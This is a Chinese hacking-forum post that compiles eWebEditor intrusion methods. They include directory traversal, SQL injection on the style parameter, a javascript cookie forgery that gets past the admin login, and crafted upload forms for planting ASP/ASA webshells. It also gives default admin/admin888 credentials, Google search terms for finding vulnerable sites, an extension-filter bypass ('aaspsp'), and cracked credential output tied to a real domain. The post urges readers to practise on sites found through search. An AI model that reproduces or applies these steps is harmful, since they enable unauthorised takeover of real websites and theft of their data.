中国网络渗透测试联盟
标题:
Ewebeditor漏洞2
[打印本页]
作者:
admin
时间:
2012-9-13 17:00
标题:
Ewebeditor漏洞2
eWebEditor.asp?id=45&style=standard1 样式调用
: N% h2 M0 F0 f+ A6 b- ]; e' o
) D( C' x1 g2 ^) O* K
( t6 e. j6 F0 D( D3 r
/edit/admin_uploadfile.asp?id=14&dir=../../..
# T) _, W7 r" E+ b
可以浏览网站目录 ../自己加或者减
' g4 g6 E8 \. L% l/ C4 n
9 P3 e! J: ]. `
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
* N2 T/ N+ W3 I
简单利用就是
% B3 W& I; n6 Y9 }) E
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
! Z: U2 s- L- ` S' C; _% y w( W
http://www.siqinci.com/ewebedito
... amp;style=full_v200
9 y( }: s ]. O$ u% V% v
可以利用nbsi进行猜解,对此进行注入
! I4 N0 E' r! p
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
$ d5 O( B. G7 O8 k6 G* p
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
8 t6 ]0 }' ^* l9 Q6 }$ ?
在action下面
% k1 O5 V/ o" R. h1 x
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
+ u+ E0 m5 l+ d8 F
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
! }, v- d8 @, n/ s. s/ n" o' d
<input type="submit" name="uploadfile" value="提交">
4 ~* b4 z! Q/ X4 D6 n7 p
<input type=hidden name=originalfile value="">
4 A* w5 R; r/ W3 |) x
</form>
F! }$ ~4 |1 O5 `1 [" Z0 B9 K+ E$ u
------------------------------------------------------------------------------------------------------------------------------------------------
0 ?% ]7 t# Z. t3 W- P
<input type="submit" name="uploadfile" value="提交"> 放在action后头
1 m& i( ~& G6 z$ E& V% ~
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
/ H! p2 k# L7 b' p, \8 \8 _0 ^
) W. S. }4 x9 i4 |4 E
\* D! B# z4 p1 q6 R3 E$ D
" E# [9 q5 E$ }$ [; J+ v# B; y5 m
8 s5 `' l( C5 x; E( D
Ewebeditor最新漏洞及漏洞大全[收集] (图)
. m9 `4 w, o \1 H6 K
本帖最后由 administrator 于 2009-7-7 21:24 编辑
5 ], t: ~% \& d) j0 _) s4 D# H
7 }7 N6 q I8 a, q T. [
以下文章收集转载于网络
9 Q& g- H* O+ s" S- I
#主题描述# ewebeditor 3.8漏洞[php]
$ K8 V/ u/ J$ _& ]1 F* C9 [* a0 J( P
--------------------------------------------------------------------------------------------
1 V: w" z0 H; y ]8 _
#内容#
" w7 J0 l( _ O3 v! w
php版ewebeditor 3.8的漏洞
" ~, c. J2 S e2 Y
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
2 Y) l! S, v- U- }" i: q
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
0 E; Z9 E+ Q' N( [
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
& q% U; ?* S9 h7 U7 V0 p, ^4 z5 p
3 后面的利用和asp一样,新增样式修改上传,就ok了
s+ A" t7 Q& P4 a: o) N8 [
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
' |9 {" q3 v- x) W3 L0 C9 M
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
: D1 U* U. \4 h- g* ?/ K" a; ^
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
+ A* h! z0 f- @* H7 v
--------------------------------------------------------------------------------------------
. H. M- m, `' y- q
) e: V4 y: Z8 C* e- ]+ x8 f
% b5 X; c$ R; n5 t- t1 n4 G' v' t
算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
2 |) c5 O: I$ Y; g# E+ R0 u; K6 J8 w: y
9 m7 q) ^# O2 w R/ I# z4 F2 W# F+ Y
漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
& m+ k D5 K# O- U$ ?" M: w
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
2 p6 d" P4 f/ q) a( p* l2 ?
那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址
! @' M# L. S- M0 D7 @* ]. U% {
) L9 s7 b, i& ?
$ ]. @+ T$ r4 w
然后确定以后,这里是最关键的一部!
- V- k9 K8 ~+ M
这里点了远程上传以后,再提交得到木马地址
" p" @; S7 F$ E5 K y% N1 n
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限
9 B2 i0 C1 l$ w1 t1 j
属于安全检测漏洞版本ewebeditor v6.0.0
( U5 G) e; V6 W2 a; B- t% {3 m6 I
" |; [ l3 ?8 P2 u/ t
以前的ewebeditor漏洞:
, k9 R2 X2 } M6 K0 |0 {. e+ `" s
- R; O* `$ f( \4 j
ewebeditor注入漏洞
4 R6 x: Y% _) L& F# H$ k
2 d/ y7 N) {7 w$ b: K& Y
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
9 q4 i( u. C) t0 N0 E- x7 N
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
$ K* N, }3 R+ z* r7 z+ R
今天我给大家带来的也是ewebeditor编辑器的入侵方法
s# ?: L8 q+ a+ l( W$ P
不过一种是注入,一种是利用upload.asp文件,本地构造
* a" j) P5 `; ?) ~% M
NO1:注入
* K6 x1 `& o2 o* t; j
http://www.XXX.com/ewebeditor200
... amp;style=full_v200
4 x: }/ T/ ?7 f, o& q5 Q
编辑器ewebedior7以前版本通通存在注入
* X/ I& j0 F S
直接检测不行的,要写入特征字符
; Y' }- V3 N; k+ V" Q% ^+ Q2 E
我们的工具是不知道ewebeditor的表名的还有列名
" }) v/ E, f! B8 ~! ~) f4 ]4 ~
我们自己去看看
& U- Q- Z( Q1 t) F- o8 c. G
哎。。先表吧
6 [" j8 m$ F: `: ? l; o
要先添加进库
d C! q1 l, M
开始猜账号密码了
# H3 e' b( C" L; |
我们==
U* h* e2 l% l* s( o1 B
心急的往后拉
. G0 K# ~( t: f* b- s/ P
出来了
3 G% Z# C3 Q9 t" d. B
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
$ u1 S" v% {. L, y/ r7 f0 s
对吧^_^
" m" ~' \6 C/ x( c
后面不说了
3 w3 r+ C) y- O4 j, |) `
NO2:利用upload.asp文件,本地构造上传shell
0 \5 m/ b' h* @# s% x6 f
大家看这里
1 ]+ V2 M; j1 z, s/ \, I) j: g
http://www.siqinci.com/ewebedito
... lepreview&id=37
+ I3 H. [! w+ I& m% \7 D
如果遇见这样的情况又无法添加工具栏是不是很郁闷
0 h9 V2 [8 f# `6 p
现在不郁闷了,^_^源源不一般
5 Q" G$ E* l( U9 B
我们记录下他的样式名“aaa”
^1 j% F& N; ^$ p5 ~' t: c0 h
我已经吧upload.asp文件拿出来了
8 [5 D% ~# X8 D3 R( h$ N
我们构造下
1 y/ C4 c$ n3 m" c+ L
OK,我之前已经构造好了
, a5 J/ U: V4 v3 A% G f" d9 u- S, Y
其实就是这里
+ p& c8 C2 E4 i: u! n* E
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
) Y k/ I8 x6 g) K
<input type=file name=uploadfile size=1 style=”width:100%”>
( ]9 A8 X5 n4 \3 K
<input type=submit value=”上传了”></input>
$ l. A. C9 Q+ r' Z
</form>
, n# z9 |( s5 X8 I. w# I
下面我们运行他上传个大马算了
( d+ L2 D7 h5 k: K$ V
UploadFile上传进去的在这个目录下
' t& c4 h$ ]" U
2008102018020762.asa
: w' P2 ^( j5 c, V4 ^: Z
, r0 J8 Y5 [" t# Z+ I3 Y) J
过往漏洞:
9 D }' [$ v ?5 W- {" V9 P2 b2 y0 }
5 u* ~9 g: X* q* v4 k; a
首先介绍编辑器的一些默认特征:
" Z1 i' s3 o" p1 Q) L
默认登陆admin_login.asp
6 f+ W* C2 J8 a; f
默认数据库db/ewebeditor.mdb
: k+ Y3 W4 s F; C9 p+ I6 [
默认帐号admin 密码admin或admin888
/ s: ?! q7 |% d8 `" o
搜索关键字:”inurl:ewebeditor” 关键字十分重要
& ]& i& J$ X! c& ^0 c+ b
有人搜索”eWebEditor - eWebSoft在线编辑器”
( p, U8 z9 S9 o8 V; V0 @
根本搜索不到几个~
' n) o3 ?) `" ~* y
baidu.google搜索inurl:ewebeditor
' \! W- n4 Z8 x4 W4 {- ~
几万的站起码有几千个是具有默认特征的~
, t% ~9 T X) N0 p) I. {
那么试一下默认后台
+ \' B3 n2 y5 l; @' D& l% v: F4 K1 K
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
8 `$ i9 f" y9 B2 [' a& z' Y& ~
试默认帐号密码登陆。
0 }4 [. `% r& ?0 j- x2 [# f
利用eWebEditor获得WebShell的步骤大致如下:
% ^9 A9 J& v5 ^) ^, ?; Q
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
/ L8 h8 m0 S$ h) P/ }& S
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
9 M! D4 Q5 ?2 K- E' ~; B* m. H
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
* [) n0 \6 }! Q C
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
8 L4 ~1 P! t# Z9 `- f( M, V W
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
3 b& n' z9 B! z) Z4 z; S
然后在上传的文件类型中增加“asa”类型。
3 B4 B0 J# ]5 y- Y! x; f
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
8 p9 a% a' V, x: _
漏洞原理
! D: V" F* Z+ v2 t0 N A" V
漏洞的利用原理很简单,请看Upload.asp文件:
7 E% g0 U" {& [( h, t) O! u w
任何情况下都不允许上传asp脚本文件
. `; ^- F4 ^ g! `) r
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
' e* Q6 _9 G5 N* d+ l1 N
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
( \- {* J4 ]1 U4 F. L! D
高级应用
' V5 w" P" z l6 |3 \9 K
eWebEditor的漏洞利用还有一些技巧:
# m0 Z' x& q3 g/ B7 p
1.使用默认用户名和密码无法登录。
+ T! G& K6 q& W1 f4 B
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
+ V" D6 U( _% g9 D
2.加了asa类型后发现还是无法上传。
2 Y; l% S2 l H& P. z5 x4 L: A0 W
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
+ Q; I0 h# Q9 R; t2 n
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
) A' m( v o& z; y3 y* e
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
9 B0 B# t/ T9 K9 }4 |
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
: }0 D5 _* [" Z
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
K% J1 K) y- I5 N! ^% Z2 t
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
0 v8 D m- U. R, M
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
% P1 k& K# B. w6 o- E7 x9 A- S
后记
0 w7 s) i0 T* z O- x
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
% r6 D+ j. X, }' c W+ |
基本入侵基础漏洞
+ T0 j% N) \0 i4 d. M5 Y7 I
eWebEditor 漏洞
7 V" v4 O1 S7 G. ?& l2 f- m
& Z- h) u: a' k; L; V
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
5 }: N9 k' J- [' b/ J3 @
: f/ M* M6 Q; J% z' d+ q- X
漏洞利用
: R. h7 f% P9 ]$ ~# t n
利用eWebEditor获得WebShell的步骤大致如下:
/ ?% z7 `3 f+ D
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
9 j/ `8 y3 y& k: z" T
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
% d# x8 L T! F4 u) u4 l5 t4 A
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
8 a! X- u, U: S3 h! z1 n. F
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
; c$ L7 a% ] w4 w0 N
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
" C* |# S, p. r+ ~, r
V* W; D$ [1 b% g4 A! P
然后在上传的文件类型中增加“asa”类型。
: D, Q3 y; M: q: s4 J7 u: [8 n
$ M9 l2 t$ ^: W: H
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
3 f1 c* m' t C' N
7 _# F+ b- [& ]; N2 ~9 c
7 I5 V% d0 k! W5 k: e/ M# n
漏洞原理
# _. i9 b( Y3 u# E9 X. `% o
漏洞的利用原理很简单,请看Upload.asp文件:
0 h. C3 f I4 ^7 J: a+ S
任何情况下都不允许上传asp脚本文件
( l5 i% x: m: w* r" a
sAllowExt = replace(UCase(sAllowExt), "ASP", "")
" W# P% P4 R# S. l; ?
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
( }* o! O) y5 P
( n; C9 a a8 k) ?
高级应用
, s+ J) _1 |1 V0 F& I, w
eWebEditor的漏洞利用还有一些技巧:
" y1 r4 \& e, }4 h' k
1.使用默认用户名和密码无法登录。
& a6 f0 j, {; ?
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
, x! O5 }8 f( n" j- {
2.加了asa类型后发现还是无法上传。
5 O+ h0 R6 [ _% q0 V- h
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
: p6 G& `! _$ H
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
9 ]6 S2 O6 \# T2 e
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
) g. c0 V$ I* B/ @
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
5 {7 u" ? w8 H2 J# [9 H" g/ f
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
, [% \ D8 A% }) Y) \
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
Q3 Q$ d4 _! T, W- L2 n, a7 i4 x7 X
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
2 a0 [6 T V8 k7 h* U6 _7 ~
. x( O: c! X8 j* U/ U
后记
) d9 [$ W8 \2 X, x
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2